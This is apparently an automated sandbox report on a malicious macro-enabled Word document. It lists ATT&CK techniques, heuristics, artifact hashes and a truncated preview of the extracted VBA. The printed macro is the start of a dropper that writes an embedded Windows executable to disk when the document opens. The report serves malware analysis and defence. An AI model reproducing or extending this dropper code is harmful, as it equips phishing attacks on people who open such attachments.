Verdict: MALICIOUS (Risk Score: 282)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is an OOXML document containing VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Malware.Valyria-6714124-0' further supports its malicious nature. The document body content appears to be unrelated to the malicious functionality.
Heuristics (6)
- ClamAV: Doc.Malware.Valyria-6714124-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6714124-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project (VBA macros present)
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every extracted URL carries the label "In document text (OOXML body / shared strings)".
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 104504 bytes | 24e45389b5db782cc7c1ebfbffb085d4bf11d6b735556e7ea177ce9f3f8afb9a |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 260096 bytes | 309101604fc89c6fbe3a99bc6f8bf3917c1255fe67e90a043d7dec73d48c0c53 |

Preview script (macros.bas): first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Returns True when the file exists; FileLen raises an error for a missing
' path, which On Error Resume Next swallows, leaving FE False.
Private Function FE(V As String) As Boolean
    On Error Resume Next: FE = (FileLen(V) > -1)
End Function

' Each assignment to Y writes one 4-byte Long to the file opened as #1.
Private Property Let Y(Value As Long)
    Put #1, , Value
End Property

Private Sub CheckHash()
    ' 9460301 = &H00905A4D, written little-endian as the bytes 4D 5A 90 00 ("MZ"),
    ' the start of a DOS/PE executable header.
    Y = 9460301
    Y = 3
    Y = 4
    Y = 65535
    Y = 184
    Y = 0
    Y = 64
    For I = 1 To 8
        Y = 0
    Next
    Y = 128
    Y = 247078670
    ' A long run of further "Y = <integer>" assignments follows here;
    ' the report's preview of this run is itself truncated.
```
Detection
- ClamAV: Doc.Malware.Valyria-6714124-0
- Obfuscation or payload: unlikely